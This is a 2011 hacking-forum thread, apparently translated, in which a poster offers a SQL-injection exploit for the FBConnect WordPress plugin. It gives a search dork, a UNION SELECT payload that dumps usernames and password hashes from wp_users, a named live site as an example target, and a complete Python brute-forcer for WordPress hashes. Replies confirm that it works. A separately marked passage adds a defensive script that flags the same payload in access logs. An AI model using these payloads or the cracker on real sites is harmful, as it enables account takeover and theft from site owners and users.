x3uz Posted May 8, 2011 (edited)

Wordpress Sql Injection
App : FBConnect WordPress Plugin
Type : Sql-Injection
Dork : inurl:"fbconnect_action=myhome"

Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

Example: http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users--

Ok, when you have the hash, md5 and encode64() you can test a bruteforce with this (python):

# code by : tdxev
# website : www.tdxev.com
# team : www.insecurity.ro
# version : 2011.01.17
# documentation : /wp-includes/class-phpass.php
import hashlib
import time

# user settings
wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"]  # list of wordpress hashes  # $P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev
charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-'  # the character set that the script will use
dumpFile = '/tmp/wp_crack_result.txt'  # the file where the script will dump the result for each hash
progFile = '/tmp/wp_crack_progress.txt'  # the file where the script will keep track of progress made

# app settings
itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'  # used by crypt_private


def encode64(textInput, count):
    # phpass's own base64 variant: packs 3 input bytes into 4 itoa64 characters
    # (textInput is a bytes object, so indexing already yields integers)
    output = ''
    i = 0
    while i < count:
        value = textInput[i]
        i += 1
        output += itoa64[value & 63]
        if i < count:
            value |= textInput[i] << 8
        output += itoa64[(value >> 6) & 63]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= textInput[i] << 16
        output += itoa64[(value >> 12) & 63]
        if i >= count:
            break
        i += 1
        output += itoa64[(value >> 18) & 63]
    return output


# generate wordpress hash
def crypt_private(plainText, wordpressHash):
    output = '*0'  # old type | not supported yet
    if wordpressHash[0:2] == output:
        output = '*1'
    if wordpressHash[0:3] != '$P$':  # old type | not supported yet
        return output
    count_log2 = itoa64.find(wordpressHash[3])  # log2 of how many times the hash will be iterated
    if (count_log2 < 7) or (count_log2 > 30):
        return output
    count = 1 << count_log2  # how many times the hash will be iterated
    salt = wordpressHash[4:12]  # get salt from the wordpress hash
    if len(salt) != 8:
        return output
    password = plainText.encode()
    plainTextHash = hashlib.md5(salt.encode() + password).digest()  # first hash from salt and word to try
    for i in range(count):
        plainTextHash = hashlib.md5(plainTextHash + password).digest()  # regenerate the hash
    output = wordpressHash[0:12]  # first part of the wordpress hash (type, count, salt)
    output = output + encode64(plainTextHash, 16)  # create the new hash
    return output


# class that generates the words
class wordGenerator:
    def __init__(self, word, charSet):
        self.setCurrentWord(word)  # word to start
        self.setCharSet(charSet)  # character set used to generate the words

    # set current word
    def setCurrentWord(self, word):
        self.currentWord = word

    # set the character set that will be used
    def setCharSet(self, charSet):
        self.charSet = charSet

    # generate the next word, set that word as currentWord and return the word
    def nextWord(self):
        self.setCurrentWord(self._incWord(self.currentWord))
        return self.currentWord

    # generate the next word
    def _incWord(self, word):
        word = str(word)  # convert to string
        if word == '':  # if word is empty
            return self.charSet[0]  # return first char from the char set
        wordLastChar = word[-1]  # get the last char
        wordLeftSide = word[:-1]  # get word without the last char
        lastCharPos = self.charSet.find(wordLastChar)  # position of last char in the char set
        if (lastCharPos + 1) < len(self.charSet):  # last char is not at the end of the char set
            wordLastChar = self.charSet[lastCharPos + 1]  # get next char from the char set
        else:  # it is the last char
            wordLastChar = self.charSet[0]  # reset last char to the first character from the char set
            wordLeftSide = self._incWord(wordLeftSide)  # carry: send the left side to be increased
        return wordLeftSide + wordLastChar  # return the next word


# check if the hashes are the right type
for wpHash in wpHashList:
    if wpHash[0:3] != '$P$':
        print("Wrong password type or password type is DES, not implemented yet!")
        exit()

# create a new wordGenerator
newWord = wordGenerator('', charSet)  # word generator
wordsFound = 0
exitLoop = False


def found(hashItem, word):
    global wordsFound
    global exitLoop
    d = open(dumpFile, 'a')  # open file for append
    d.write(hashItem + ' = ' + word + "\n")  # write the result
    d.close()  # close file
    wordsFound = wordsFound + 1  # increase the number of hashes cracked
    print(hashItem + ' = ' + word)  # display the word
    if wordsFound == len(wpHashList):  # all hashes in the list are cracked
        exitLoop = True  # raise flag to stop the loop and exit


def setProgress(word):
    d = open(progFile, 'w')  # open file for writing
    d.write("Position :" + word + "\n")  # write the current word
    d.close()  # close file


count = 0
while exitLoop == False:
    word = newWord.nextWord()
    count = count + 1
    # print(word)
    for wpHash in wpHashList:
        newHash = crypt_private(word, wpHash)
        if wpHash == newHash:
            found(newHash, word)
    if count == 1000:
        count = 0
        setProgress(word)

H4ve fun :D:D

Edited May 8, 2011 by x3uz
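Added example, not part of x3uz's post or of the FBConnect plugin: a small check a site owner can run over web-server access logs to flag requests shaped like the injection above (fbuserid that is not a plain integer, UNION SELECT, a reference to wp_users). The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache access-log lines (not real traffic); the second
# line carries the fbuserid UNION SELECT shape from the post, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [08/May/2011:10:01:02 +0000] "GET /?fbconnect_action=myhome&fbuserid=1 HTTP/1.1" 200 5120
10.0.0.9 - - [08/May/2011:10:01:07 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 6144
10.0.0.7 - - [08/May/2011:10:02:11 +0000] "GET /wp-login.php HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')
# "union" followed within a few characters by "select", case-insensitive
UNION_RE = re.compile(r'\bunion\b.{0,20}\bselect\b', re.IGNORECASE | re.DOTALL)


def inspect_request(path):
    """Return a list of findings for one request path; empty if it looks benign."""
    findings = []
    # parse_qs decodes '+' to space and %28 / %29 to parentheses for us
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if params.get("fbconnect_action") != ["myhome"]:
        return findings
    for value in params.get("fbuserid", []):
        if not value.isdigit():  # the plugin expects a numeric Facebook user id
            findings.append("fbuserid is not a plain integer")
        if UNION_RE.search(value):
            findings.append("UNION SELECT in fbuserid")
        if "wp_users" in value.lower():
            findings.append("references wp_users")
    return findings


def scan_log(text):
    """Return (line number, client IP, findings) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = inspect_request(m.group("path"))
        if findings:
            hits.append((lineno, line.split()[0], findings))
    return hits


if __name__ == "__main__":
    for lineno, ip, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {', '.join(findings)}")
```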
Paul4games Posted May 8, 2011 It has been public on exploit-db for some time.....
x3uz Posted May 8, 2011 (Author) With the python script....? I do not think so \M/
Paul4games Posted May 8, 2011 Not with python, but as far as I know you could have used sqlmap...
Mr.KyKy Posted May 19, 2011 x3uz, tested and it works 100%. Nice work, maybe you will manage to find something directly on facebook.
MagicThunder Posted May 19, 2011 @redcoder haven't you realised yet that people post any old thing now? Some post just to be part of it even when they are completely clueless. I bet MR.KYKY has no idea what a dork is or how to use one. Even if you gave him the script compiled and with a GUI he would have no idea what to do with it. Stop posting for the sake of posting, guys, because it amounts to nothing. Better to have 10 times fewer posts but with something useful, not junk. All the "hello" and "welcome" topics have more replies than any others. At least bloody look at what Nytro posts and learn something. On his topics I have seen no replies, or very rarely.
hammerfall Posted May 19, 2011 (edited) @thunder magic, honestly, I think it is fine that there are not many replies on nytro's topics. It would be absurd to see all the kids commenting "that's right, the tutorial is good" or "you're right, it really works". Besides, I do not think most (of the kids) understand English well enough to get through a tutorial... they manage at Metin, at CS, at silly stuff, but for a tutorial it has to be translated into Romanian, with as many pictures as possible. Sorry for the off-topic, but I could not help myself. By the way, nice SQLi, I have not had the chance to test it yet, but I think I will make time tomorrow. Edited May 19, 2011 by hammerfall SQLi not XSS... tiredness... :p
MagicThunder Posted May 19, 2011 Hammerfall, I was referring to intelligent and actually tested replies, not the kind: "that's right, the tutorial is good" or "you're right, it really works". Better none at all than that, honestly. What xss are you talking about?
hammerfall Posted May 19, 2011 I edited the post... Tiredness... As if it was not written in big letters in the title...
Mr.KyKy Posted May 20, 2011 (edited) redcoder I did it manually! Edit: MagicThunder, and what if I tell you that I do know about dorks, xss, perl, c++, python, visual basic 2006-2008 etc... Next time please restrain yourself, especially with the language. After all, we are on a forum where we do not go off-topic for no reason, ok? Thanks. For you MagicThunder: Edited May 20, 2011 by Mr.KyKy